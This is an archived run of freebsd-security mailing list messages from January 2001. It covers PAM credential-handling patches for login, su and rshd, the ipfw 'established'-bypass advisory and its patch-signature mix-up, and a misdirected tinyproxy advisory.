Vidrine" , freebsd-security@freebsd.org References: <200101232143.f0NLhXJ91854@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101232143.f0NLhXJ91854@freefall.freebsd.org>; from nectar@FreeBSD.org on Tue, Jan 23, 2001 at 01:43:33PM -0800 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 23, 2001 at 01:43:33PM -0800, Jacques Vidrine wrote: > nectar 2001/01/23 13:43:32 PST > > Modified files: > usr.bin/login login.c > Log: > Call pam_setcred. > > Reviewed by: markm, months ago This gets you to the point that if you carefully [1] configure PAM, and you log in using pam_krb5, you will have tickets. As per the pam_krb5 documentation, you have to destroy them yourself with `kdestroy'. One day when pam_setcred stacking in Linux-PAM works, you won't have to be so careful with configuration. Also one day, someone may have login fork() so that it can call pam_close_session and ditch the credentials. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org [1] In most cases, making sure pam_krb5 is first in your config is enough to do the trick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 14:13:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 6DA4937B69D for ; Tue, 23 Jan 2001 14:13:22 -0800 (PST) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id D6ECE193E4; Tue, 23 Jan 2001 16:13:18 -0600 (CST) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NMDIE81819; Tue, 23 Jan 2001 16:13:18 -0600 (CST) (envelope-from nectar@spawn.nectar.com) Date: Tue, 23 Jan 2001 16:13:18 -0600 From: "Jacques A. Vidrine" To: "David J. MacKenzie" Cc: freebsd-security@freebsd.org Subject: Re: PAM patches, iteration 4 Message-ID: <20010123161318.A95429@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org References: <20010123184611.E675046C7@dagger.web.us.uu.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010123184611.E675046C7@dagger.web.us.uu.net>; from djm@web.us.uu.net on Tue, Jan 23, 2001 at 01:46:11PM -0500 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 23, 2001 at 01:46:11PM -0500, David J. MacKenzie wrote: > I've updated the docs to reflect PAM, cleaned up some error handling, > and included my patch to work around the pam_setcred() dispatch problem. > I also removed the non-logincap code path from su and rshd, since it's > already mandatory in login. As before, this replaces my earlier patches. > I'd welcome having PAM experts examine them closely. I think they're > ready for a wider audience. Oops, I just committed a 3-line patch to login.c to call pam_setcred. This'll put your diff off a wee bit. These patches look like good to me. The pam_setcred workaround is no worse than what we have now [1], and it is useful. I'll let you know how they work for me (on -STABLE). Thanks! -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org [1] All the PAM modules in the base system just return PAM_SUCCESS, so this will have no effect unless a third-party module is installed, such as ports/security/krb5. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 15:24:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from catapult.web.us.uu.net (catapult.web.us.uu.net [208.211.134.20]) by hub.freebsd.org (Postfix) with ESMTP id 0EA8F37B400 for ; Tue, 23 Jan 2001 15:24:16 -0800 (PST) Received: from catapult.web.us.uu.net (localhost.web.us.uu.net [127.0.0.1]) by catapult.web.us.uu.net (Postfix) with ESMTP id 6AC8C3E5B; Tue, 23 Jan 2001 18:24:15 -0500 (EST) To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org Subject: Re: PAM patches, iteration 4 In-Reply-To: Message from "Jacques A. Vidrine" of "Tue, 23 Jan 2001 16:13:18 CST." <20010123161318.A95429@hamlet.nectar.com> Date: Tue, 23 Jan 2001 18:24:15 -0500 From: "David J. MacKenzie" Message-Id: <20010123232415.6AC8C3E5B@catapult.web.us.uu.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > These patches look like good to me. The pam_setcred workaround is no > worse than what we have now [1], and it is useful. > > [1] All the PAM modules in the base system just return PAM_SUCCESS, so > this will have no effect unless a third-party module is installed, > such as ports/security/krb5. The pam_krb5 port does the right thing, I believe. One unresolved question I have is, when should pam_end() be called. Probably in the same places that login_close() and endpwent() are. I think I called it in places where it's unnecessary and omitted it in a place where it's important. Here's a patch to my last patch set to make pam_end() calls more consistent. It's still not perfect yet, though; anytime after pam_setcred(PAM_ESTABLISH_CRED) has been called, before exiting, pam_setcred(PAM_DELETE_CRED) should be called to clean up. Perhaps the same for pam_open_session() and pam_close_session(). I haven't done that so far. --- su.c 2001/01/23 18:10:00 1.16 +++ su.c 2001/01/23 23:15:02 @@ -235,7 +235,6 @@ retcode = pam_set_item(pamh, PAM_RHOST, myhost); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); } @@ -245,7 +244,6 @@ retcode = pam_set_item(pamh, PAM_TTY, mytty); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); } @@ -253,7 +251,6 @@ retcode = pam_authenticate(pamh, 0); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } @@ -268,13 +265,11 @@ retcode = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } } if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_acct_mgmt: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } } @@ -485,6 +480,10 @@ if (env != NULL) { for (i=0; env[i]; i++) putenv(env[i]); + } + retcode = pam_end(pamh, PAM_DATA_SILENT); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, retcode)); } #endif /* USE_PAM */ --- login.c 2001/01/23 00:57:28 1.8 +++ login.c 2001/01/23 23:10:47 @@ -593,7 +593,7 @@ PAM_END; exit(0); } else { - if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + if ((e = pam_end(pamh, PAM_DATA_SILENT)) != PAM_SUCCESS) syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); } } @@ -738,14 +738,12 @@ if ((e = pam_set_item(pamh, PAM_TTY, tty)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, e)); - pam_end(pamh, e); return -1; } if (hostname != NULL && (e = pam_set_item(pamh, PAM_RHOST, full_hostname)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, e)); - pam_end(pamh, e); return -1; } e = pam_authenticate(pamh, 0); --- rshd.c 2001/01/23 18:09:49 1.14 +++ rshd.c 2001/01/23 23:14:05 @@ -382,21 +382,18 @@ retcode = pam_set_item (pamh, PAM_RUSER, remuser); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RUSER): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } retcode = pam_set_item (pamh, PAM_RHOST, fromhost); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } retcode = pam_set_item (pamh, PAM_TTY, "tty"); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } @@ -414,7 +411,6 @@ if (retcode != PAM_SUCCESS) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", remuser, fromhost, locuser, pam_strerror(pamh, retcode), cmdbuf); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } @@ -535,9 +531,6 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); -#ifdef USE_PAM - PAM_END; -#endif /* USE_PAM */ exit(1); } if (pid) { @@ -681,7 +674,6 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); - PAM_END; exit(1); } if (pid) { @@ -717,6 +709,8 @@ for (i=0; env[i]; i++) putenv(env[i]); } + if ((retcode = pam_end(pamh, PAM_DATA_SILENT)) != PAM_SUCCESS) + syslog(LOG_ERR|LOG_AUTH, "pam_end: %s", pam_strerror(pamh, retcode)); #endif /* USE_PAM */ endpwent(); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 17: 3:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id 8D81F37B6A8; Tue, 23 Jan 2001 17:03:07 -0800 (PST) Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.1/8.11.1/2000-12-01) with ESMTP id f0O135l05147; Wed, 24 Jan 2001 10:03:05 +0900 (JST) (envelope-from ishizuka@ish.org) To: security-advisories@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010123210823.349E837B402@hub.freebsd.org> References: <20010123210823.349E837B402@hub.freebsd.org> X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt X-URL: http://www.ish.org/ Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010124100304J.ishizuka@onion.ish.org> Date: Wed, 24 Jan 2001 10:03:04 +0900 From: Masachika ISHIZUKA X-Dispatcher: imput version 20000414(IM141) Lines: 27 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > FreeBSD-SA-01:08 > > Topic: ipfw/ip6fw allows bypassing of 'established' keyword > [snip] > > [FreeBSD 4.x] > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch.asc Hi, this is ishizuka@ish.org. The patch files shown above are correct ? pgp show bad signature as follows. | % pgpv -m ipfw-4.x.patch.asc | This signature applies to another message | File to check signature against [ipfw-4.x.patch]: | BAD signature made 2001-01-23 03:32 GMT by key: | 1024 bits, Key ID 73D288A5, Created 1996-04-22 | "FreeBSD Security Officer " | % md5 ipfw-4.x.patch* | MD5 (ipfw-4.x.patch) = 6c7cf3425a62c54a4e32a85faa87a505 | MD5 (ipfw-4.x.patch.asc) = 6edf1b52f33af8d6b34fbd60ef7d74cd -- ishizuka@ish.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 18:22:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 80FB537B402 for ; Tue, 23 Jan 2001 18:22:18 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O2Ph823914; Tue, 23 Jan 2001 18:25:43 -0800 (PST) (envelope-from kris) Date: Tue, 23 Jan 2001 18:25:38 -0800 From: Kris Kennaway To: Masachika ISHIZUKA Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw Message-ID: <20010123182538.A23758@citusc17.usc.edu> References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ew6BAiZeqk4r7MaW" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010124100304J.ishizuka@onion.ish.org>; from ishizuka@ish.org on Wed, Jan 24, 2001 at 10:03:04AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ew6BAiZeqk4r7MaW Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 24, 2001 at 10:03:04AM +0900, Masachika ISHIZUKA wrote: > Hi, this is ishizuka@ish.org. >=20 > The patch files shown above are correct ? > pgp show bad signature as follows. Oops, not sure what went wrong then (the bad signature was in fact the one I uploaded, but it must have been against an older version of the diff). I have uploaded the correct signature now. It's good to see people are actually checking this! Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --ew6BAiZeqk4r7MaW Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6bj0hWry0BWjoQKURAhgjAJ9LzOJ0NtNhc+jX9bt+rmYqWvHcoACeJGc9 Z/9Ltr5Du6eB0Q9um0sCCMo= =Mzb5 -----END PGP SIGNATURE----- --ew6BAiZeqk4r7MaW-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 18:36: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id 1194937B400; Tue, 23 Jan 2001 18:35:47 -0800 (PST) Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.2/8.11.1/2000-12-01) with ESMTP id f0O2ZjV13790; Wed, 24 Jan 2001 11:35:45 +0900 (JST) (envelope-from ishizuka@ish.org) To: kris@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010123182538.A23758@citusc17.usc.edu> References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org> <20010123182538.A23758@citusc17.usc.edu> X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt X-URL: http://www.ish.org/ Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010124113545V.ishizuka@onion.ish.org> Date: Wed, 24 Jan 2001 11:35:45 +0900 From: Masachika ISHIZUKA X-Dispatcher: imput version 20000414(IM141) Lines: 16 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> The patch files shown above are correct ? >> pgp show bad signature as follows. > > Oops, not sure what went wrong then (the bad signature was in fact the > one I uploaded, but it must have been against an older version of the > diff). I have uploaded the correct signature now. > > It's good to see people are actually checking this! Dear, Kris. Thank you for updating ipfw-4.x.patch.asc. I can be successful checked pgp signature. -- ishizuka@ish.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 18:47:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id BFC4B37B698 for ; Tue, 23 Jan 2001 18:47:18 -0800 (PST) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id SAA74117 for ; Tue, 23 Jan 2001 18:47:08 -0800 (PST) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Tue, 23 Jan 2001 18:47:08 -0800 (PST) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010123210823.349E837B402@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Anyone else failing here?: Patching file sys/netinet/ip_fw.c using Plan A... Hunk #1 succeeded at 244. Hunk #2 failed at 1214. Thanks. - Todd On Tue, 23 Jan 2001, FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-01:08 Security Advisory > FreeBSD, Inc. > > Topic: ipfw/ip6fw allows bypassing of 'established' keyword > > Category: core > Module: kernel > Announced: 2001-01-23 > Credits: Aragon Gouveia > Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), > FreeBSD 3.5-STABLE and 4.2-STABLE prior to the > correction date. > Corrected: 2001-01-09 (FreeBSD 4.2-STABLE) > 2001-01-12 (FreeBSD 3.5-STABLE) > FreeBSD only: Yes > > I. Background > > ipfw is a system facility which allows IP packet filtering, > redirecting, and traffic accounting. ip6fw is the corresponding > utility for IPv6 networks, included in FreeBSD 4.0 and above. It is > based on an old version of ipfw and does not contain as many features. > > II. Problem Description > > Due to overloading of the TCP reserved flags field, ipfw and ip6fw > incorrectly treat all TCP packets with the ECE flag set as being part > of an established TCP connection, which will therefore match a > corresponding ipfw rule containing the 'established' qualifier, even > if the packet is not part of an established connection. > > The ECE flag is not believed to be in common use on the Internet at > present, but is part of an experimental extension to TCP for > congestion notification. At least one other major operating system > will emit TCP packets with the ECE flag set under certain operating > conditions. > > Only systems which have enabled ipfw or ip6fw and use a ruleset > containing TCP rules which make use of the 'established' qualifier, > such as "allow tcp from any to any established", are vulnerable. The > exact impact of the vulnerability on such systems is undetermined and > depends on the exact ruleset in use. > > All released versions of FreeBSD prior to the correction date > including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable, but it was > corrected prior to the (future) release of FreeBSD 4.3. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security-notifications" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 18:56:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id B2BAA37B69F for ; Tue, 23 Jan 2001 18:56:38 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 6AC321360C; Tue, 23 Jan 2001 21:56:38 -0500 (EST) Date: Tue, 23 Jan 2001 21:56:38 -0500 From: Chris Faulhaber To: freebsd-security@FreeBSD.org Subject: tinyproxy advisory Message-ID: <20010123215638.B47775@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ============================================================================= FreeBSD-SA-01:XX Security Advisory FreeBSD, Inc. Topic: tinyproxy contains multiple remote vulnerabilities Category: ports Module: tinyproxy Announced: 2001-XX-XX Credits: |CyRaX| Affects: Ports collection prior to the correction date. Corrected: 2001-01-22 Vendor status: Updated version released FreeBSD only: NO I. Background tinyproxy is a lightweight http proxy II. Problem Description The tinyproxy port, versions prior to 1.3.3a, contains multiple remote vulnerabilities. Due to a heap overflow, malicious remote users can cause a denial-of-service by crashing the proxy. Additionally, the attacker may potentially cause arbitrary code to be executed as the user running tinyproxy. The tinyproxy port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4200 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious remote users may cause a denial-of-service and potentially cause arbitrary code to be executed. If you have not chosen to install the tinyproxy port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the tinyproxy port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the tinyproxy port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/tinyproxy-1.3.3a.tgz NOTE: It may be several days before updated packages are available. 3) download a new port skeleton for the tinyproxy port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 19: 4:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id E46F337B6A0 for ; Tue, 23 Jan 2001 19:04:04 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id BEA9613613; Tue, 23 Jan 2001 22:04:04 -0500 (EST) Date: Tue, 23 Jan 2001 22:04:04 -0500 From: Chris Faulhaber To: freebsd-security@FreeBSD.org Subject: Re: tinyproxy advisory Message-ID: <20010123220404.A2625@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-security@FreeBSD.org References: <20010123215638.B47775@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010123215638.B47775@peitho.fxp.org>; from jedgar@fxp.org on Tue, Jan 23, 2001 at 09:56:38PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 23, 2001 at 09:56:38PM -0500, Chris Faulhaber wrote: > > ============================================================================= > FreeBSD-SA-01:XX Security Advisory > FreeBSD, Inc. > > Topic: tinyproxy contains multiple remote vulnerabilities > oops, ignore this, sent to the wrong list :) -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 19: 8:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 2E96137B69F for ; Tue, 23 Jan 2001 19:08:09 -0800 (PST) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id TAA74172 for ; Tue, 23 Jan 2001 19:07:39 -0800 (PST) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Tue, 23 Jan 2001 19:07:38 -0800 (PST) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org BTW... this is occuring upon 2 of my 4.0 machines. Thanks. - Todd On Tue, 23 Jan 2001, Todd Backman wrote: > > Anyone else failing here?: > > Patching file sys/netinet/ip_fw.c using Plan A... > Hunk #1 succeeded at 244. > Hunk #2 failed at 1214. > > Thanks. > > - Todd > > On Tue, 23 Jan 2001, FreeBSD Security Advisories wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > ============================================================================= > > FreeBSD-SA-01:08 Security Advisory > > FreeBSD, Inc. > > > > Topic: ipfw/ip6fw allows bypassing of 'established' keyword > > > > Category: core > > Module: kernel > > Announced: 2001-01-23 > > Credits: Aragon Gouveia > > Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), > > FreeBSD 3.5-STABLE and 4.2-STABLE prior to the > > correction date. > > Corrected: 2001-01-09 (FreeBSD 4.2-STABLE) > > 2001-01-12 (FreeBSD 3.5-STABLE) > > FreeBSD only: Yes > > > > I. Background > > > > ipfw is a system facility which allows IP packet filtering, > > redirecting, and traffic accounting. ip6fw is the corresponding > > utility for IPv6 networks, included in FreeBSD 4.0 and above. It is > > based on an old version of ipfw and does not contain as many features. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 19:10: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from cscfx.sytex.com (cscfx.sytex.com [205.147.190.131]) by hub.freebsd.org (Postfix) with ESMTP id C5D5437B69F; Tue, 23 Jan 2001 19:09:48 -0800 (PST) Received: (from rwc@localhost) by cscfx.sytex.com (8.11.1/8.11.1) id f0O39hP15584; Tue, 23 Jan 2001 22:09:43 -0500 (EST) (envelope-from rwc) From: Richard Cramer MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14958.18295.257000.756678@cscfx.sytex.com> Date: Tue, 23 Jan 2001 22:09:43 -0500 (EST) To: Masachika ISHIZUKA Cc: kris@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010124113545V.ishizuka@onion.ish.org> References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org> <20010123182538.A23758@citusc17.usc.edu> <20010124113545V.ishizuka@onion.ish.org> X-Mailer: VM 6.72 under 21.1 (patch 8) "Bryce Canyon" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 19:17:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mc-qout4.whowhere.com (mc-qout4.whowhere.com [209.185.123.18]) by hub.freebsd.org (Postfix) with SMTP id 1263037B6A2 for ; Tue, 23 Jan 2001 19:17:11 -0800 (PST) Received: from Unknown/Local ([?.?.?.?]) by hotbot.com; Tue Jan 23 19:17:00 2001 To: kris@FreeBSD.ORG Date: Tue, 23 Jan 2001 19:17:00 -0800 From: "bob Dobolina" Message-ID: Mime-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG X-Sent-Mail: off Reply-To: devolve@hotbot.com X-Mailer: MailCity Service Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw X-Sender-Ip: 207.5.63.61 Organization: HotBot Mail (http://mail.hotbot.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 702 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hmm, well it looks like the date of ipfw-4.x.patch.asc is in the year 2000, while ipfw-4.x.patch is in the year 2001. This is starting to get a bit unsettling. >> The patch files shown above are correct ? >> pgp show bad signature as follows. > > Oops, not sure what went wrong then (the bad signature was in fact the > one I uploaded, but it must have been against an older version of the > diff). I have uploaded the correct signature now. > > It's good to see people are 